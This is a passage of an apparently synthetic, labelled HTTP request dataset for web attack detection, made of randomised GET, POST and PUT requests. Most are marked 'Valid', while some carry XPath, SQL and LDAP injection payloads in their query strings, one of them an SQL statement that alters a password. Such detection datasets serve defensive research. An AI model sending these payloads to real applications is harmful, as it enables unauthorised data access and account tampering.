If-Unmodified-Since: Thu, 01 Jan 09 18:29:53 UTC
If-Match: *
If-None-Match: "cKNsyFSGWwPXZEB.lM"
If-Range: Tue, 20 Jan 04 14:31:59 CET
Max-Forwards: 7
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Vigo a1lc=hriaibi
Authorization: Digest response="A6a4a2b8F2ca6BFBDedc188fbb5b52Fb"
Range: 2531-5,49-34
Referer: /3aalpaam/feedwFC.css
TE: gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.3 (X11; U; Linux i586 5.9; AN-hp; rv:9.3.5) Gecko/03418741
UA-CPU: StrongARM
UA-Disp: 5769,5085,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 265x4380
Via: FTP/2.4 235.117.230.204, FTP/4.6 187.122.157.41
Transfer-Encoding: identity
Upgrade: stHn3n/5.6, nuthh/9.0, irat7/4.8, wgloo/1.0
Warning: 569 www.oq8ot.css "draaicTya4hanxeos" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24878
Start - Id: 10538
class: Valid
GET /9e/Fusrb1g/lMaK2dnrRJHk/ldn8fcRn9iOtT/c.c.0Z/UZkJuhu3eXYand.shtml?pXAQ-SYrwd@=1218877&g2jhyqh=oFlyW5Ayf&7tdnra=901302&8aLn=eTOd&k0dahqa_evalreplaceYB=5i6A&oRe=0c%29Eytu&te=usris&sncscriptwMTamcK6=6&remaftnzrji9ho=aareouauynra&ahttpsGFall7Z2Np=fO4k HTTP/1.1
Host: 194.196.157.24:49065
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: GRoja-i, rh1-ts;q=0.6, oy-pnsl0e, e84owm2h-3Zaeeu;q=0.2, e-Otem;q=0.3
Cache-Control: no-store
Client-ip: 40.197.76.243
Cookie: ado1=1;tcwideSuiti3n=hcd't;tqdtaa=ndnseaetee~0m;REPlRpf=bHk.40aZtqT;th=trml5ataIqnrllwn;mej=09
Cookie2: $Version="06"
Date: Sat, 24 Nov 07 09:00:10 CET
ETag: "Z6TFyDoQOplBAOE5I34"
Expect: otne
From: utiS4a@drr2lt9za.ch
If-Modified-Since: Fri, 07 Oct 05 05:54:36 UTC
If-Unmodified-Since: Thu, 09 Feb 06 04:48:21 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Mar 04 20:45:38 UTC
Max-Forwards: 21
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest algorithm=MD5
Range: -8188
Referer: http://www.l9l4.it/bbzdtnki/yiiGhT/uhegjnn.css
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 7.7; h1-cq; rv:5.4.7) Gecko/06822994
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4657x757
Via: 2.2 www.athnzo.html
Transfer-Encoding: deflate
Upgrade: Nf5rt/6.5, ioEY0/5.3, 30O/5.0, Taonn/0.0, rrsr8/6.3
Warning: 651 197.207.19.157 "Eao2i1eOwwy2npmn" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 67839839
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10538
Start - Id: 25462
class: Valid
GET /aeanthgehec/09EQPwoSK0MMK2tm08f/a0/enb/aRbXiKZcE/xs8E/e9dTm2yv_snE9FzryJd/cmqrs/gt6@GJVy.nNNUKFBh88Z/n3bM327.jpeg? HTTP/1.0
Host: 13.8.246.243
Connection: keep-alive
Accept: text/html;q=0.0, video/mpeg;q=0.5, text/xml
Accept-Charset: euc-kr, x-mac-chinesesimp;q=0.6, big5;q=0.1, cp-936;q=0.9, x-mac-cyrillic;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 16.186.114.94
Cookie: ejntme6a5c=ulqn;incsbenjawny=jera;Iqp3libkk7Cx=mEr;itoeenAx=d)sya;rnreviauyn1tlnh=xsecsmhest9ts1ho
Cookie2: $Version="557"
Date: Thu, 10 Apr 08 24:09:36 CET
ETag: W/"LbW7cfqwZiZO5En4hW"
Expect: iela
From: crOatmT@utfooi2e.be
If-Modified-Since: Thu, 24 May 07 14:09:11 UTC
If-Unmodified-Since: Thu, 19 Feb 04 09:46:18 CET
If-Match: "UZXAeS6c0GmWJjLhggD0"
If-None-Match: "YoXfCbGpviku@3I"
If-Range: "0entJtuSwpc1HptybJO"
Max-Forwards: 3215
MIME-Version: 8.3
Pragma: z=o
Proxy-Authorization: Digest uri=http://www.es3nrdl.de/qeog.pdf
Authorization: NTLM cHJlbk5lbHA5dDgzaVJneWl2cmRreG5ydGVmbmVyZW5qZA==
Range: -7599
Referer: /agssx/ddtto2gs/yeo94s/htmnt.fgf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Ch9ca (nIKMahuKA6; w8HXfGO; lMYxn72w; nFvLUY0; mbDm0DE3kM)
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 710x415
Via: FTP/3.7 www.plns.htm, 1.9 www.ntza.tiff
Transfer-Encoding: deflate
Upgrade: beumb/2.2, f5l/6.8
Warning: 416 102.2.131.29 "kRtoim" "Sun, 08 Nov 09 07:27:56 CET"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25462
Start - Id: 34782
class: Valid
POST /Sa/BYfMpasswdl0aP/xB5@30TaxTnSDkrYbR/hnzieiegtetantaqao/VUircpctmpSNwaiexecUe.png? HTTP/1.1
Content-Length: 165
Content-Language: gda
Content-Encoding: gzip
Content-Location: http://www.pHroe.biz/p0b5me/dst1/ababo/ml7esd.rar
Content-MD5: ZW9yZW9paW5BczF6ZWRzdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Oct 06 02:04:24 CET
Last-Modified: Wed, 03 Mar 10 11:22:42 UTC
Host: 112.87.227.188
Connection: anii
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, compress, gzip, deflate, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 100.1.231.182
Cookie: ecta0Z=734;BaPetcqt4WY22B=975675424;Lukbm=tZBb;childnQmWUconnectyL=ezpLMY
Cookie2: $Version="26"
Date: Sun, 07 Feb 10 24:38:55 UTC
ETag: W/"qy9RGYQYU@vXKZIJ2hvz"
Expect: 100-continue
From: zproium8@ratn.ch
If-Modified-Since: Mon, 29 May 06 06:30:54 CET
If-Unmodified-Since: Wed, 06 Sep 06 17:35:59 GMT
If-Match: "rMId5qs-VlIVVytX"
If-None-Match: *
If-Range: Sun, 24 May 09 03:40:52 CET
Max-Forwards: 13
MIME-Version: 7.2
Pragma: e='ir3aa'
Proxy-Authorization: Digest opaque="eRl54bWu"
Authorization: tlP6 2lloAeep=rpinn
Range: -904
Referer: http://uns1r.biz/13d2/jutnph/acMheece/sstoe/o7mn5.jpg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.2 (compatible; MSIE 8.8; Unix; tztNseo; nrnwdNO; Wgwoffs7)
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 262x4505
Via: 2.6 www.bh7rnCe.shtml
Transfer-Encoding: h7rf; s2mi6=hhtSnta
Upgrade: Zem/1.3, pcRSe/9.2
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1dUeeeohml8dnc=6&mo=cy0boot.inis&form1le&ptudlgesap9=?mtksarCePw-7lsdst&XwicfvE=39&PsEKH18=xtwgetmid2tghe&nzk_XO_SDy2=4h&tuZrz=pMQ1F&lmZeteieiE9b=ecgnigaga7nehkf

End - Id: 34782
Start - Id: 6836
class: Valid
PUT /sriXbnaarah9irdca/mIitwhs1Ii0acd/lYnMCeFzO8BP/i1r4notsO/r4Go1fennFroCEu9ear.jpeg? HTTP/1.0
Content-Length: 67
Content-Language: tnbgd
Content-Encoding: gzip
Content-Location: /ii7aae/ipmnn/dbTi2h/urwfvfti/eihzeori.dll
Content-MD5: bXRyZWVhZWhubDdzN29zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Dec 09 20:41:18 CET
Last-Modified: Wed, 01 Mar 06 19:42:13 UTC
Host: www.blnohitrtE.st
Connection: etEab
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Tc-ge;q=0.2, sloonl-toEXe1dd;q=0.9
Cache-Control: no-store
Client-ip: 133.77.123.5
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="6"
Date: Fri, 29 Jan 10 08:54:11 CET
ETag: "gEp5UJJk2-.LHHm"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Sun, 23 Jul 06 15:08:51 GMT
If-Unmodified-Since: Sun, 14 Jan 07 19:40:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Nov 06 03:48:56 GMT
Max-Forwards: 8
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest realm
Range: 708-,54-
Referer: /AmEi.pdf
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 1.9; i5-tg; rv:5.7.2) Gecko/04374892
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 302x0187
Via: FTP/0.9 www.sve3eht.png:475
Transfer-Encoding: compress
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 912 84.206.83.150 "a7hihrekexzr7" "Fri, 16 Feb 07 11:59:14 UTC"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 476384803
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

eajur=&&Oroeo0toENrenn=0Rvpb5Q&tTihyt3=D~o&SPqs.wn=75283&aea=19

End - Id: 6836
Start - Id: 5810
class: Valid
POST /s75l_qvZFui/mT6@kuY/I@libIq9/a@XndbqfBn/a4t73453z5Qc33O39/0zrah8pti/n3ehrgn/t2aS5de36r/ncw_H/p9wwfKmv3_/gci3m-/xt5G9jidbetweenj4p.aspx? HTTP/1.0
Content-Length: 104
Content-Language: iimdo
Content-Encoding: compress
Content-Location: http://vaho.fr/unnse/ndgiDzh/Tettbb.cfm
Content-MD5: bnNpRXJhcnQ5ZXBuZ2VyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jan 04 18:13:06 GMT
Last-Modified: Wed, 02 Jun 04 21:02:42 GMT
Host: 12.137.251.116
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: etsnh='aeng'
Client-ip: 42.172.144.34
Cookie: Ol=nbaypiihT;gmwsiArueie=6145390;FtsvfmetavEi=ecNeg;nprocessing-instructionz@z=d8Rd;nnmau=okthalolog|cd6)e=
Cookie2: $Version="558"
Date: Wed, 20 Jun 07 16:32:15 UTC
ETag: "NkgRDiPvvWYEzIY4i6-"
Expect: 100-continue
From: s8eohuh@Trune.de
If-Modified-Since: Mon, 09 Aug 04 09:00:36 CET
If-Unmodified-Since: Sat, 02 Feb 08 04:20:31 CET
If-Match: *
If-None-Match: "Avd3ca2K9TS9FeGXu0U"
If-Range: Wed, 11 Oct 06 24:53:37 GMT
Max-Forwards: 24
MIME-Version: 2.7
Pragma: timcpeex='dttheKt'
Proxy-Authorization: Basic dXBuY3VkOmhzMW9v
Authorization: Basic dDE5b2F5Om93NGk=
Range: 741779-46
Referer: /opsNso/hnmst.mp3
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/1.0 (compatible; grjshtemhs; Windows NT; jron; h9etdd1; axyll)
UA-CPU: MIPS
UA-Disp: 3134,886,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1021x7299
Via: 6.1 www.pioprai.css:156, HTTP/4.5 218.59.68.179
Transfer-Encoding: gzip
Upgrade: 1io/8.4, at7e/6.8
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 128.88.36.141
X-Serial-Number: 8692230651
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

lwniii=3690&t6awn15t=aa+att&atssTi=d&cclote=4oPezqeeidew&c6Rinuiwcu=1t9C5e&rn2Rf5oek4=e&d0ii5olae=ient

End - Id: 5810
Start - Id: 23282
class: Valid
GET /8GuiEketvrPQ2vea6/1ulaYvIV/dF4_oMEw5XLsHIh4cbh7/WoAYrcose/ovcRd8Cr/9ILxquM_x7p.php4?y1p4srsteun=ie%26e&xgae=otgucy6wdlq8ctXe&liaSE=inniaM&pq7breplaceKcS=56427489&i5ght=stzahnRafie&sEhree=eereheI&etyciaoctpea=rmmhe%3BaUauopenutoe&ig=tarsz&6sElTpelnDtm5i=ehegg%40o&bbD0_xhttpsJlocationX=2780616 HTTP/1.0
Host: www.stlo.uk
Connection: 6Eaem
Accept: */*
Accept-Charset: windows-1255, us-ascii, euc-kr, x-mac-greek;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=9841
Client-ip: 181.44.84.160
Cookie: zeD8oqm0=u
Cookie2: $Version="0"
Date: Sun, 18 May 08 14:56:54 UTC
ETag: W/"3zGC8EZYyc7@ZJ9"
Expect: 100-continue
From: shoany@Ttr0ilprE.de
If-Modified-Since: Tue, 07 Jun 05 20:58:29 CET
If-Unmodified-Since: Fri, 30 Dec 05 14:54:49 CET
If-Match: "6AoPh5lFuYKaHx5C.Sbr"
If-None-Match: "9HdviFXmUZJTvPCFB"
If-Range: Thu, 11 May 06 10:03:46 UTC
Max-Forwards: 0
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="5tlS"
Authorization: Basic eWllM281ZTplZG5sZW5xag==
Range: 46049-,984-,955-52588
Referer: /rresl8q.jpg
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/6.5 (Windows; U; Windows NT 9.7; ah-Li; rv:9.3.5) Gecko/74975551
UA-CPU: PowerPC
UA-Disp: 5075,682,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1756x8385
Via: 4.0 81.148.85.223, HTTP/5.5 www.eifi7ti2.css:6
Transfer-Encoding: gzip
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 872 www.sebg8i.css:7654 "2usu" 
X-Forwarded-For: 51.105.50.137
X-Serial-Number: 736748310370
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23282
Start - Id: 49097
class: XPathInjection
GET /9Rk/iP7jf4/bfnueenx1nret/oiDufds/3olvu5/l6Izj6.jpeg?e5cylcvdt6=iUee%2Fse%2Fl9%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D++or+++++%27eey%27++++%3D++++%27&servicesjy9H8ibeUu=92669916 HTTP/1.0
Host: 73.98.117.83:08
Connection: Osehh
Accept: audio/*, text/*;q=0.9
Accept-Charset: x-mac-icelandic, shift_jis
Accept-Encoding: 
Accept-Language: Ddae9s5-tnan, et-peOpwsaE
Cache-Control: no-cache
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="212"
Date: Thu, 08 Jan 04 10:39:49 UTC
ETag: W/"RJ4LQ1xuFMWfEwkbYGU4"
Expect: 100-continue
From: oayjh@w9ulna6.biz
If-Modified-Since: Thu, 03 Jul 08 07:47:27 GMT
If-Unmodified-Since: Sat, 06 Nov 04 23:42:54 GMT
If-Match: "C4MbCYCfY54wx-My6eCe"
If-None-Match: "YVW6aYEA78kymeS"
If-Range: Sun, 18 Jan 09 01:02:49 CET
Max-Forwards: 61
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: adqtoa teaeor=anizrf4
Range: -21
Referer: http://www.uousp1e.com/larttr4/lltobws/txsao.cgi
TE: trailers,trailers
Trailer: Referer
User-Agent: eluk73tehn/3.4
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: gzip
Upgrade: aau/4.8
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49097
Start - Id: 9925
class: Valid
GET /a_Ak-OCyWLgc-7r/pFBwkkQwtmNL/8v4zN3.h1PHPH5/terl7cD/IHa/omwaSeb.shtml?iudEaiohnstma=8pCn-CT1mW3C&itozp7iS3=Th&vik5cservicesnys=u9Dxtelhf%28o&oUnt6ia4d5Rnth=94185180&dcnpMqeoffilra9=18&BE=109 HTTP/1.0
Host: www.4csh2ef.uk
Connection: ugo8
Accept: text/*;q=0.6, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: odt-sm, aaInkTa7-eSe;q=0.7, m-iwue;q=0.5
Cache-Control: only-if-cached
Client-ip: 176.83.236.118
Cookie: unslDOOde=72455;ddo1eWph=nmetan1vtq;fApidI8=ep5o79RuKG;yE5n=4ccopy'ferr
Cookie2: $Version="2"
Date: Mon, 01 Jan 07 05:58:55 GMT
ETag: "vx4sXFZuE2ziptGDL"
Expect: m8dkgye
From: xGtn@mhhy.de
If-Modified-Since: Thu, 23 Feb 06 15:55:12 GMT
If-Unmodified-Since: Sun, 15 Feb 04 13:41:47 GMT
If-Match: "1PG12tYqrxIIU2qZ8.b"
If-None-Match: "WT5CDYUjRD6ajY9C"
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 00
MIME-Version: 3.5
Pragma: saa='eDcsxs'
Proxy-Authorization: Digest realm
Authorization: Basic cG5paWVkOnJob28=
Range: -073,-7284,0-
Referer: http://oqstoih.de/rNde/szxnpIeo.gz
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.2 (compatible; sortmUaeer; Open BSD i586; oreoi)
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 496x973
Via: HTTP/0.1 66.195.179.117, FTP/7.0 157.4.78.205, 7.3 121.144.209.57:1096
Transfer-Encoding: gzip
Upgrade: dauz/8.3, e8tu/1.3, caH/0.7, Ass/4.7, enfo/0.0
Warning: 465 www.rewstm.jpeg "srthru38ehh" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9925
Start - Id: 20369
class: Valid
GET /dds/snrshd/uv_H2MFiX8FWxb/scfoawsRs24afrElro/coeHtartsnleyil2orf/la/fUbohwQ0TIflc/kzU51lsCq7N0/UU1wcformXokKU/gaal0da6nntseS.shtml? HTTP/1.1
Host: www.cO1hsifwhr.biz:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.5, gzip;q=0.5, identity
Accept-Language: ve-gats
Cache-Control: no-cache
Client-ip: 154.221.244.163
Cookie: anese0d7m=446;458a0Ujz=]qxaF
Cookie2: $Version="19"
Date: Sat, 20 Jun 09 24:19:31 UTC
ETag: "YXxs7h-s8UqG4YDka"
Expect: yg4us1u=IoeT
From: ueaw@nsel.fr
If-Modified-Since: Mon, 11 Jan 10 18:46:13 CET
If-Unmodified-Since: Sun, 18 Dec 05 10:20:18 GMT
If-Match: "B9xUqTPV5tCHy9ugdA"
If-None-Match: *
If-Range: Sat, 10 Oct 09 23:44:55 UTC
Max-Forwards: 4
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Digest nc=7e65Ce1b
Range: 144-
Referer: /bda9.js
TE: trailers
Trailer: From
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 3.2; h1-zl; rv:2.9.7) Gecko/97994227
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: FTP/8.2 www.tgfp.gif, HTTP/2.0 www.2tEni.html, 0.6 www.tedr.jpeg
Transfer-Encoding: gzip
Upgrade: nxt3/7.1
Warning: 591 25.163.162.46 "crRlttnfy34yatEthsd" 
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20369
Start - Id: 26936
class: Valid
GET /BK/nladege/DAU/6rmtctnasgskonynL/pjkOdFsgSJeua-Lyt1vs/o.Q@7uCxri4A5/1B/rYfyedldeciuln1br28/2C5O8JIkR1usrbcopy/wN@9BmCN6PG/iz.php4? HTTP/1.1
Host: www.dhepaSir.it
Connection: 6mai
Accept: video/*, application/postscript;q=0.3, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Oten-0pdicca;q=0.0, hs-etsbh, caMAumib-oEdoo, te8-esi9swy, 3t-7scBo;q=0.1
Cache-Control: max-stale=707
Client-ip: 177.49.29.12
Cookie: sjAhhna5=01;w8eacy87ii=914930453;xDIYvat=ophp0$iamse ;oO4group byrw=54405;rheavrt=n/a;ged=a0oidtmxoH0
Cookie2: $Version="471"
Date: Tue, 16 Nov 04 14:47:00 GMT
ETag: "ZObs8aG3O6N@ztd8"
Expect: 100-continue
From: lsshs@ramaar.cz
If-Modified-Since: Wed, 10 Mar 04 04:16:50 UTC
If-Unmodified-Since: Tue, 27 Nov 07 01:29:53 GMT
If-Match: *
If-None-Match: *
If-Range: "cf26jYtL1MuzNKcKC7xk"
Max-Forwards: 005
MIME-Version: 9.1
Pragma: 7esho=leh2k
Proxy-Authorization: Lsqh neinrtc=qqEEf
Authorization: Basic bWw5MmVFOmxpY29EcQ==
Range: 909287-,-7
Referer: /dovg9pgl/rarpho/eaedosyB/hIuhtle.bin
TE: trailers
Trailer: Range
User-Agent: rivmpo
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 863x0796
Via: FTP/0.7 www.d1EtOt.jpeg, 1.1 www.en9l.gif, HTTP/7.3 www.eesm9e.tiff
Transfer-Encoding: aea2m
Upgrade: ectpgF/8.1, Hhdah/8.5, poai/0.7, eb2ee/2.4
Warning: 561 www.wyno.js "aaajeaa" "Mon, 25 May 09 20:49:12 UTC"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26936
Start - Id: 41628
class: SqlInjection
GET /MkloTD/whefqeoedlseadHnstUs/mleaecoQemtasiehn/-jIXAIdZZl_PD/aetePBtt/aB6dYqIBVtbPNEU7HE9q.htm?oez=27753&eeohiuesjfs7gc3=ie-J.D&oraevrii3pie=do-ht7-+re%2Fx&agr64A8eeo=6&-L_betweenX75=dn+loea&hP2wutth=hiirt%3F%2Fe+smc6a&9perlu-F2=nbstdintneOh53&RLMFiC5wT=Xdb&7eaifrwrra=%3Balter+table++++teinnt+++++set++++password++%3D++++%27aner%27+++++where++name+++++%3D+%273m2tonon%27%3B HTTP/1.1
Host: 64.230.85.167
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 166.71.235.134
Cookie: bttt= ovs7ai;eady8hephfe=1;8hcaaosmSR=22
Cookie2: $Version="003"
Date: Tue, 24 Oct 06 06:02:56 CET
ETag: W/"LQFO4hCK5wqIuHc"
Expect: dSei2edr=aNexTn
From: enlbuaah@iDob1m.fr
If-Modified-Since: Fri, 04 Apr 08 13:20:17 GMT
If-Unmodified-Since: Wed, 12 Dec 07 03:25:41 GMT
If-Match: "ANlUb@68rpGQSJn"
If-None-Match: *
If-Range: Sun, 09 Apr 06 07:14:00 CET
Max-Forwards: 091
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="79C75af55cadC09dAd9f9Ac26803Fabe"
Range: 53962-110288
Referer: http://www.Iafyma.org/YnTurghz/eittToU/mama/spo8a.rar
TE: trailers
Trailer: Authorization
User-Agent: ettd (bM.s5.; ek@al72; nI.@xhZjA; 1wGNFM0_45; riR4SlE)
UA-CPU: Sparc
UA-Disp: 5571,966,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: kont/4.7 183.243.55.235, 5.5 218.247.153.61, 2.9 www.rawiMqmE.css
Transfer-Encoding: eauta
Upgrade: olC/3.6, enno3a/9.1, rEwh/3.6, uetIa/1.1
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 475701883207700445
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41628
Start - Id: 38458
class: LdapInjection
GET /xdbodykCPwL/d-0ksystemRW1/ec/on1aIox/nlouudnhmhT3edWi/et/aetpcoesd2ahr/iaeopop/sW.G4R3.z/eh/emkRSeglWuQz7f.shtml?nEheeyIt=rse&swo9llsjnexE=uSar%24ihe%28&ee3ew=u9o7&eE3miseeq=n9icihlnmddEqd&eod=rbfhjtO&cjsba2t8nn=uneuelx&-dlYb=x40btgh&1cttotrVs2ltoet=31939435&1aat0ir=7eetme&htDolsryieah=35&dnsdohems=ttwherea4i&tivmhaehda7ct=Ueservicesw&YrmF_hM@_6in=+%3Csil+o6p%5Bi&toempell=0aheotnrA%3De&hMHndWrmdivK=6575%29%28%26%28objectClass%3Duwi%29%28%7C%28sn%3D+areh%29%28cn%3Dwe+++++J*%29%29 HTTP/1.0
Host: 144.204.150.156:60
Connection: keep-alive
Accept: image/png, text/*, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Be-iil
Cache-Control: min-fresh=405
Client-ip: 131.162.142.41
Cookie: php0cattDZo0Y.=yarrxtermsd/o;nkBo=es1hoteagNt;onahodasaiAmlnr=sieiielprhRh;bnifdl=e7;e;9h=objectwhf%sldiv;jeeWts7aens5t=812
Cookie2: $Version="35"
Date: Wed, 08 Mar 06 24:04:53 GMT
ETag: "BEY1rkX2szAN0S7hA"
Expect: 100-continue
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sun, 08 Aug 04 20:10:14 UTC
If-Unmodified-Since: Fri, 23 Jan 04 01:43:42 CET
If-Match: "umgmdH3Pk..eY0_P0-hh"
If-None-Match: *
If-Range: *
Max-Forwards: 921
MIME-Version: 3.3
Pragma: o3autEen=elpo
Proxy-Authorization: tkpee UiM63=shnNe4q
Authorization: Basic ODVuc25naGw6bmF4dG1p
Range: -282,947-,12514-
Referer: /yStet.cgi
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.2 (X11; U; Linux i386 9.2; 6o-el; rv:8.2.4) Gecko/52718884
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 2.4 www.oaneeeyt.gif:88210, refeaA/2.6 www.iOgN.html
Transfer-Encoding: deflate
Upgrade: he9qat/8.2, oIocas/7.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38458
Start - Id: 5330
class: Valid
POST /rruno/pKr/CvarTr_Orm/whrl2isnmdsgid/ilKFP6/6Wo/cz/cbosttl/p75tzbmOsdwrhiAo/uoP-9j_BE65.sh? HTTP/1.0
Content-Length: 220
Content-Language: asy,abeU,t
Content-Encoding: gzip
Content-Location: /uhLs/ehtqh7/ofts.js
Content-MD5: cm56cmV4bmU4N0RkaTN0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 06:51:04 UTC
Last-Modified: Sat, 15 Dec 07 10:47:28 UTC
Host: 18.88.236.50:80
Connection: keep-alive
Accept: application/*, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: 55konh-daeie1e;q=0.3, d-rsL6e1th
Cache-Control: min-fresh=479
Client-ip: 228.9.222.37
Cookie: erln5tneawg=Nn@e;alosxsm2=\E;LqQxmld.Q-B@=44;0ga=6197298;Nhecrtmrls9Sinl=hoierHl8tmp0i;vCI4nfTCx=dhPw8xJa
Cookie2: $Version="847"
Date: Sun, 25 Sep 05 05:59:26 CET
ETag: W/"TrLLp2DSFY6tfXnbJee"
Expect: ic2itgnO=eI8kays
From: rfnrLte@nf1er.st
If-Modified-Since: Sat, 01 May 10 03:14:05 GMT
If-Unmodified-Since: Thu, 28 Dec 06 20:12:24 CET
If-Match: "eZqAzXu1@M4xDE3"
If-None-Match: *
